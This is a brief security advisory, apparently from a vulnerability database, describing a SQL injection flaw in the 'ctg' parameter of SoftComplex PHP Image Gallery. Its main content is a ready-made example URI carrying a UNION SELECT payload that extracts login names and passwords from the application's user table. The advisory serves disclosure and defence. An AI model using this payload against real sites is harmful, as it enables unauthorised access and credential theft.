SoftComplex PHP Image Gallery 'ctg' Parameter SQL Injection Vulnerability

SoftComplex PHP Image Gallery 'ctg' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/index.php?ctg=39 and 1=0 UNioN seLecT 1,2,concat(login,0x3e,password),4,5,6,7,8+FROM+user&action=show